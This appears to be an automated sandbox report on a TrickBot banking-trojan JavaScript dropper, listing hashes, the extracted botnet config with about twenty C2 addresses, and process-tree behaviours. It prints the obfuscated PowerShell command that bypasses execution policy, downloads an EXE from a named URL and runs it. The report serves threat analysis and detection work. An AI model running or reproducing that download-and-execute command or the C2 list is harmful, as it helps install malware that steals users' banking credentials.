trickbot | 4bdc0f495dfb6d2425fd712ccdda2d1943c700e3b780c37c1c147462a30c9e30

General

Target

wGGlWA9kvQ.js
Size

30KB
MD5

71e84623c9f780a2ae34c49964a1d4fd
SHA1

8bab366961bf4363c13b169f086c959ff8515e85
SHA256

4bdc0f495dfb6d2425fd712ccdda2d1943c700e3b780c37c1c147462a30c9e30
SHA512

f4cd7ccd1bf213e3262e4268b0247466b31e3bed3b3877a54b24e58d6710b6f1e83dce581d6d88ab544382cd6559fca2955e83657fd7801d0852fd00497327eb

Score

10^/10

trickbot rob35 banker trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://dralex.smartwebsitedesign.com/local.php

Extracted

Family

trickbot

Version

100010

Botnet

rob35

C2

5.34.180.180:443

64.74.160.228:443

198.46.198.116:443

5.34.180.185:443

107.152.46.188:443

195.123.241.214:443

23.254.224.2:443

107.172.188.113:443

200.52.147.93:443

185.198.59.45:443

45.14.226.101:443

185.82.126.38:443

85.204.116.139:443

45.155.173.248:443

103.91.244.50:443

45.230.244.20:443

45.226.124.226:443

187.84.95.6:443

186.250.157.116:443

186.137.85.76:443

Attributes

autorun
Name:pwgrab

ecc_pubkey.base64

Signatures

Trickbot
Developed in 2016, TrickBot is one of the more recent banking Trojans.
trojan banker trickbot
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 2044 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

TempNeX26.exe

pid process

836 TempNeX26.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

TempNeX26.exe

pid process

836 TempNeX26.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

2044 powershell.exe
2044 powershell.exe
Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description pid process

Token: SeDebugPrivilege 2044 powershell.exe

flow	pid	process
6	2044	powershell.exe

pid	process
836	TempNeX26.exe

pid	process
836	TempNeX26.exe

pid	process
2044	powershell.exe
2044	powershell.exe

description	pid	process
Token: SeDebugPrivilege	2044	powershell.exe

Suspicious use of WriteProcessMemory 10 IoCs

Processes:

wscript.execmd.exe

description	pid	process	target process
PID 844 wrote to memory of 1172	844	wscript.exe	cmd.exe
PID 844 wrote to memory of 1172	844	wscript.exe	cmd.exe
PID 844 wrote to memory of 1172	844	wscript.exe	cmd.exe
PID 1172 wrote to memory of 2044	1172	cmd.exe	powershell.exe
PID 1172 wrote to memory of 2044	1172	cmd.exe	powershell.exe
PID 1172 wrote to memory of 2044	1172	cmd.exe	powershell.exe
PID 1172 wrote to memory of 836	1172	cmd.exe	TempNeX26.exe
PID 1172 wrote to memory of 836	1172	cmd.exe	TempNeX26.exe
PID 1172 wrote to memory of 836	1172	cmd.exe	TempNeX26.exe
PID 1172 wrote to memory of 836	1172	cmd.exe	TempNeX26.exe

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\wGGlWA9kvQ.js
1⤵
- Suspicious use of WriteProcessMemory
PID:844

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','%temp%NeX26.exe'); & %temp%NeX26.exe & toMsRYPvmFupWNT
2⤵
- Suspicious use of WriteProcessMemory
PID:1172

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','C:\Users\Admin\AppData\Local\TempNeX26.exe');
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2044

C:\Users\Admin\AppData\Local\TempNeX26.exe
C:\Users\Admin\AppData\Local\TempNeX26.exe
3⤵
- Executes dropped EXE
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:836

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe
4⤵
PID:1696

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\TempNeX26.exe
MD5
4f3af3f3c9cc138989d704c9f87046c1

SHA1
291ce0a01c87fe31cee6f16ee2f13ff9a3ea1007

SHA256
8386cfb3b52b83698f4fa9a1e2589770de50cdddd45fc920cda9e58627a8f465

SHA512
1db884d2f976e73541bff1ca179898de58d0f4ede87cb21e64a2030cd668d47fc03d1b912c53bb346abead5d45864673207bb8a0dca158985289da7fe898c5f3

Download Submit
C:\Users\Admin\AppData\Local\TempNeX26.exe
MD5
4f3af3f3c9cc138989d704c9f87046c1

SHA1
291ce0a01c87fe31cee6f16ee2f13ff9a3ea1007

SHA256
8386cfb3b52b83698f4fa9a1e2589770de50cdddd45fc920cda9e58627a8f465

SHA512
1db884d2f976e73541bff1ca179898de58d0f4ede87cb21e64a2030cd668d47fc03d1b912c53bb346abead5d45864673207bb8a0dca158985289da7fe898c5f3

Download Submit
memory/836-12-0x0000000000000000-mapping.dmp

Download
memory/844-3-0x0000000002580000-0x0000000002584000-memory.dmp

Filesize
16KB

Download
memory/1172-2-0x0000000000000000-mapping.dmp

Download
memory/1696-14-0x0000000000000000-mapping.dmp

Download
memory/2044-5-0x000007FEF5BF0000-0x000007FEF65DC000-memory.dmp

Filesize
9.9MB

Download
memory/2044-9-0x0000000002020000-0x0000000002021000-memory.dmp

Filesize
4KB

Download
memory/2044-10-0x000000001C340000-0x000000001C341000-memory.dmp

Filesize
4KB

Download
memory/2044-8-0x0000000002550000-0x0000000002551000-memory.dmp

Filesize
4KB

Download
memory/2044-7-0x000000001AC30000-0x000000001AC31000-memory.dmp

Filesize
4KB

Download
memory/2044-6-0x0000000002400000-0x0000000002401000-memory.dmp

Filesize
4KB

Download
memory/2044-4-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads